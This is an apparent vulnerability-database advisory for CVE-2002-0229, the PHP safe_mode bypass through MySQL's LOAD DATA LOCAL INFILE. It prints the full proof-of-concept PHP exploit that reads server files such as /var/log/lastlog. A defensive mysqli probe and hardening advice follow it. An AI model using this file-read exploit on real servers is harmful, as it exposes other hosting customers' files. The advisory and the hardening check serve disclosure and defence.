PHP MySQL Safe Mode Access Restriction Bypass Vulnerability

Vulnerability ID: 1106596
Vulnerability type: access validation error
Published: 2002-02-03
Updated: 2005-10-20
CVE ID: CVE-2002-0229
CNNVD ID: CNNVD-200205-033
Platform: PHP
CVSS score: 7.5
|Vulnerability source
https://www.exploit-db.com/exploits/21264
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200205-033
|Vulnerability details
PHP is a server-side embedded scripting language that runs on Windows, Linux and many Unix variants. It is widely used for web development and offers very flexible configuration. Since PHP 3.0 it has supported a "safe mode". In that mode the functionality available to PHP scripts is heavily restricted: the local filesystem can only be reached through a wrapper function, and the configuration specifies which files may be accessed (read, written or executed), a check that the wrapper enforces. However, the MySQL client library bundled with PHP implements "LOAD DATA LOCAL INFILE" without going through that wrapper, so an attacker can use MySQL to bypass the safe-mode access restrictions. Because LOCAL means the file is opened and read by the client, not by the database server, the read happens inside the PHP process on the web server with that process's privileges and none of the safe-mode checks. An attacker uploads a PHP file that, when executed, connects to a MySQL database and issues a "LOAD DATA LOCAL INFILE" statement to retrieve the contents of files on the server hosting PHP. The problem is especially serious for large ISPs offering shared virtual hosting, where safe mode is relied on to keep customers out of each other's files. PostgreSQL and other PHP database extensions very likely have similar problems; MySQL is simply the one PHP supports by default.
|Vulnerability EXP
<?php
/* 
source: http://www.securityfocus.com/bid/4026/info

PHP's 'safe_mode' feature may be used to restrict access to certain areas of a filesystem by PHP scripts. However, a problem has been discovered that may allow an attacker to bypass these restrictions to gain unauthorized access to areas of the filesystem that are restricted when PHP 'safe_mode' is enabled. 

In particular, the MySQL client library that ships with PHP fails to properly honor 'safe_mode'. As a result, a user can issue a LOAD DATA statement to read files that reside in restricted areas of the filesystem (as determined by 'safe_mode').
*/

/*
   PHP Safe Mode Problem

   This script will connect to a database server running locally or
   otherwise, create a temporary table with one column, use the LOAD DATA
   statement to read a (possibly binary) file, then read it back to the
   client.

   Any type of file may pass through this 'proxy'. Although unrelated, this
   may also be used to access files on the DB server (although they must be
   world-readable or in MySQLd's basedir, according to docs).
*/


$host = 'localhost';
$user = 'root';
$pass = 'letmein';
$db   = 'test_database';

$filename = '/var/log/lastlog';     /* File to grab from [local] server */
$local = true;                      /* Read from local filesystem */

$local = $local ? 'LOCAL' : '';


$sql = array (
   "USE $db",

   'CREATE TEMPORARY TABLE ' . ($tbl = 'A'.time ()) . ' (a LONGBLOB)',

   "LOAD DATA $local INFILE '$filename' INTO TABLE $tbl FIELDS "
   . "TERMINATED BY       '__THIS_NEVER_HAPPENS__' "
   . "ESCAPED BY          '' "
   . "LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'",

   "SELECT a FROM $tbl LIMIT 1"
);

Header ('Content-type: text/plain');

mysql_connect ($host, $user, $pass);

foreach ($sql as $statement) {
   $q = mysql_query ($statement);

   if ($q == false) die (
      "FAILED: " . $statement . "\n" .
      "REASON: " . mysql_error () . "\n"
   );

   if (! $r = @mysql_fetch_array ($q, MYSQL_NUM)) continue;

   echo $r [0];
   mysql_free_result ($q);
}
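The hardened counterpart of the exploit above, as an added example that is not from the original advisory or its EXP: the same LOAD DATA LOCAL INFILE probe issued through the mysqli extension with LOCAL INFILE disabled on the client side, so an operator can check whether the file-read channel the advisory describes is still open. The host, credentials, database, table and file path are hypothetical, and a reachable MySQL/MariaDB server plus PHP with mysqli are assumed. Since safe_mode itself was removed in PHP 5.4, on any current release the effective controls are the client switch (mysqli.allow_local_infile / MYSQLI_OPT_LOCAL_INFILE) and the server variable local_infile, both of which this check exercises.

```php
<?php
/*
 * Added example, not part of the original advisory or the exploit above.
 * Re-runs the advisory's LOAD DATA LOCAL INFILE probe over mysqli with
 * LOCAL INFILE switched off on the client, and reports whether the server
 * still lets a PHP client pull a local file through the database connection.
 * Host, credentials, database, table and file path are hypothetical.
 */

$host = '127.0.0.1';
$user = 'appuser';
$pass = 'hypothetical-password';
$db   = 'test_database';
$probe_file = '/etc/passwd';   /* file an attacker would try to read via the client */

/*
 * Open a connection with the client's LOAD DATA LOCAL support disabled.
 * MYSQLI_OPT_LOCAL_INFILE must be set before mysqli_real_connect(); it is the
 * per-connection equivalent of mysqli.allow_local_infile=0 in php.ini.
 * The matching server-side control is local_infile=0 in my.cnf.
 */
function connect_without_local_infile($host, $user, $pass, $db)
{
    $m = mysqli_init();
    if (!mysqli_options($m, MYSQLI_OPT_LOCAL_INFILE, false)) {
        throw new RuntimeException('could not disable LOCAL INFILE on the client');
    }
    if (!mysqli_real_connect($m, $host, $user, $pass, $db)) {
        throw new RuntimeException('connect failed: ' . mysqli_connect_error());
    }
    return $m;
}

/*
 * Try to read $path with the advisory's trick: field and line terminators
 * that never occur in the file, so the whole file lands in one LONGBLOB cell.
 * Returns array('blocked' => bool, 'errno' => int, 'data' => string|null).
 * A hardened setup returns blocked=true: errno 1148 (ER_NOT_ALLOWED_COMMAND)
 * when the server has local_infile=0, or a client-generated error when the
 * client itself refuses to send the file.
 */
function probe_local_infile(mysqli $m, $path)
{
    $tbl = 'probe_' . time();
    if (!mysqli_query($m, "CREATE TEMPORARY TABLE `$tbl` (a LONGBLOB)")) {
        throw new RuntimeException('cannot create temp table: ' . mysqli_error($m));
    }

    $load = sprintf(
        "LOAD DATA LOCAL INFILE '%s' INTO TABLE `%s` "
        . "FIELDS TERMINATED BY '__THIS_NEVER_HAPPENS__' ESCAPED BY '' "
        . "LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'",
        mysqli_real_escape_string($m, $path), $tbl
    );
    if (!mysqli_query($m, $load)) {
        return array('blocked' => true, 'errno' => mysqli_errno($m), 'data' => null);
    }

    $res = mysqli_query($m, "SELECT a FROM `$tbl` LIMIT 1");
    $row = $res ? mysqli_fetch_row($res) : null;
    return array('blocked' => false, 'errno' => 0, 'data' => $row ? $row[0] : '');
}

header('Content-Type: text/plain');
$m = connect_without_local_infile($host, $user, $pass, $db);
$result = probe_local_infile($m, $probe_file);
if ($result['blocked']) {
    echo "LOAD DATA LOCAL refused (errno {$result['errno']}): channel closed\n";
} else {
    echo "WARNING: LOAD DATA LOCAL succeeded, read " . strlen($result['data'])
       . " bytes of $probe_file through the MySQL client\n";
}
mysqli_close($m);
```

A client-side switch only protects scripts that honour it; the server-side local_infile=0 setting refuses the statement for every client that connects, so set both and confirm with SHOW GLOBAL VARIABLES LIKE 'local_infile' that the server reports OFF.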
|References

Source: XF
Name: php-mysql-safemode-bypass(8105)
Link: http://www.iss.net/security_center/static/8105.php
Source: BUGTRAQ
Name: 20020203 PHP Safe Mode Filesystem Circumvention Problem
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=101286577109716&w=2
Source: BID
Name: 4026
Link: http://www.securityfocus.com/bid/4026
Source: NTBUGTRAQ
Name: 20020206 DW020203 - PHP clarification
Link: http://marc.theaimsgroup.com/?l=ntbugtraq&m=101303819613337&w=2
Source: NTBUGTRAQ
Name: 20020205 Re: PHP Safe Mode Filesystem Circumvention Problem
Link: http://marc.theaimsgroup.com/?l=ntbugtraq&m=101303065423534&w=2
Source: NTBUGTRAQ
Name: 20020203 PHP Safe Mode Filesystem Circumvention Problem
Link: http://marc.theaimsgroup.com/?l=ntbugtraq&m=101285016125377&w=2
Source: BUGTRAQ
Name: 20020206 DW020203 - PHP clarification
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=101304702002321&w=2